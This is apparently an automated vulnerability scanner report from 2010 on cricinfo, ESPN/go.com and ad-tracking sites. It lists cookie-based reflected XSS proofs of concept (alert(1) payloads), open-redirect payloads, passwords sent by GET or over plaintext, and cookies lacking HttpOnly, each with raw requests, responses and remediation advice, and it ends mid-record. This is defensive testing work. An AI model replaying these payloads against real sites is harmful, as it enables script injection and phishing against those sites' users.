The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de31'-alert(1)-'329e617c586 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us6de31'-alert(1)-'329e617c586;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:53 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148448 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us6de31'-alert(1)-'329e617c586, cluster: usa, ...[SNIP]... <script language="javascript" type="text/javascript"> ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload e4557--><script>alert(1)</script>390d9742830 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_screenname.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usae4557--><script>alert(1)</script>390d9742830; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:16:53 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 11716 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usae4557--><script>alert(1)</script>390d9742830, created: 2010-11-07 03:16:53 --> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload f68f3--><script>alert(1)</script>2111aaab520 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_screenname.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=usf68f3--><script>alert(1)</script>2111aaab520;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:09 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 11716 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: usf68f3--><script>alert(1)</script>2111aaab520, cluster: usa, created: 2010-11-07 03:17:09 --> ...[SNIP]...
The value of the DE2 cookie is copied into the HTML document as plain text between tags. The payload 24949<script>alert(1)</script>07dfed796ff was submitted in the DE2 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /capmon/GetDE HTTP/1.1 Host: tredir.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==24949<script>alert(1)</script>07dfed796ff; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 200 OK Connection: Close Content-Length: 1179 Content-Type: text/html; charset=iso-8859-1 Server: Barista/3.3.6
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /extern/login_status.php?access_token=false&api_key=260890547115&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3a628032%26origin%3Dhttp%253A%252F%252Fwww.cricinfo.com%252Ff15636553%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df2891719cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df23a3d00cc%26origin%3Dhttp%253A%252F%252Fwww.cricinfo.com%252Ff15636553%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2891719cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df110c2bea%26origin%3Dhttp%253A%252F%252Fwww.cricinfo.com%252Ff15636553%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2891719cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1206ce238%26origin%3Dhttp%253A%252F%252Fwww.cricinfo.com%252Ff15636553%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2891719cc&sdk=joey&session_version=3 HTTP/1.1 Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.cricinfo.com/ci/content/page/417881.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; locale=en_US
Response
HTTP/1.1 302 Found Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=f110c2bea&origin=http%3A%2F%2Fwww.cricinfo.com%2Ff15636553&relation=parent&transport=postmessage&frame=f2891719cc Content-Type: text/html; charset=utf-8 X-Cnection: close Date: Sun, 07 Nov 2010 06:09:49 GMT Content-Length: 0
8. Password field submitted using GET methodpreviousnext There are 4 instances of this issue:
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
The page contains a form with the following action URL, which is submitted using the GET method:
http://espn.go.com/espn3/index
The form contains the following password field:
password
Request
GET /espn3/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 05:45:02 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:37:57 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Cache-Expires: Sun, 07 Nov 2010 05:46:35 GMT Content-Length: 772933 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The page contains a form with the following action URL, which is submitted using the GET method:
http://espn.go.com/espn3/index/_/sport/basketball
The form contains the following password field:
password
Request
GET /espn3/index/_/sport/basketball HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 05:46:08 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:21:36 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sun, 07 Nov 2010 05:29:56 GMT Content-Length: 152684 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The page contains a form with the following action URL, which is submitted using the GET method:
http://espn.go.com/espn3/index/_/sport/football
The form contains the following password field:
password
Request
GET /espn3/index/_/sport/football HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 05:46:30 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:40:33 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sun, 07 Nov 2010 05:49:11 GMT Content-Length: 320269 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The page contains a form with the following action URL, which is submitted using the GET method:
http://espn.go.com/espn3/index/_/sport/index
The form contains the following password field:
password
Request
GET /espn3/index/_/sport/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 05:46:30 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 17:51:37 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 17:59:57 GMT Content-Length: 787554 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
The value of REST URL parameter 4 is used to perform an HTTP redirect. The payload http%3a//af9e139593981cda3/a%3fwww.247realmedia.com was submitted in the REST URL parameter 4. This caused a redirection to the following URL:
http://af9e139593981cda3/a?www.247realmedia.com
Request
GET /n/13465/13553/http%3a//af9e139593981cda3/a%3fwww.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1 Host: au.track.decideinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
9.2. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a606aae5ae1d24768/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://www.247realmedia.com?.a606aae5ae1d24768/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c?.a606aae5ae1d24768/=1 HTTP/1.1 Host: au.track.decideinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Replica-Cricket-Kit/2009%20England%20Replica%20Clothing.aspx HTTP/1.1 Host: www.cricshop.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lms0509/HSBCNACC17Aug09/lp.asp?website=Cricinfo&ads=0809PoaUS_C4CrInfo&adssize=text HTTP/1.1 Host: www.hsbcnri.co.in Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Object moved Date: Sun, 07 Nov 2010 06:10:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: lpUs.asp?website=Cricinfo&ads=0809PoaUS_C4CrInfo&adssize=text Content-Length: 190 Content-Type: text/html Expires: Sat, 06 Nov 2010 18:30:00 GMT Set-Cookie: ASPSESSIONIDSCAAAQSC=HCIEBDPCKJKFFEGDJDKJCGHP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="lpUs.asp?website=Cricinfo&ads=0809PoaUS_C4CrInfo&adssize=text">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /lms_ct/m2iGLSCH/index.asp?UserType=cricinfo_na_text_cpm HTTP/1.1 Host: www.icicibankm2i.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 06:10:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 10168 Content-Type: text/html Expires: Sat, 06 Nov 2010 18:30:00 GMT Set-Cookie: USER=USERTYPE=cricinfo%5Fna%5Ftext%5Fcpm&USERURL=UserType%3Dcricinfo%5Fna%5Ftext%5Fcpm; path=/ Set-Cookie: ASPSESSIONIDSCAAAQSC=GCIEBDPCNHDMKBPMLMIMHHCD; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
JEB2=4CD6406B6E651A44E171CE41F0006986;expires=Tue, 6 Nov 2012 6:11:27 GMT;domain=at.atwola.com;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /addyn/3.0/5113.1/221794/0/-1/size=300x250;cfp=1;rndc=128911028;noperf=1;alias=93247227;kvmn=93247227;target=_blank;aduho=300;grp=110284391;misc=110284391 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.aol.com/ads/load_v7.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; CfP=1
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT" Content-Type: application/x-javascript Set-Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986;expires=Tue, 6 Nov 2012 6:11:27 GMT;domain=at.atwola.com;path=/ Content-Length: 4641
The following cookie was issued by the application and does not have the HttpOnly flag set:
JEB2=4CD6406B6E651A44E171CE41F0006986;expires=Tue, 6 Nov 2012 6:11:28 GMT;domain=at.atwola.com;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /addyn/3.0/5113.1/221794/0/-1/size=61x21;noperf=1;alias=93309869;cfp=1;noaddonpl=y;kvmn=93309869;target=_blank;aduho=300;grp=110286297;misc=110286297 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.aol.com/ads/load_v7.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: atdses=O; CfP=1
Response
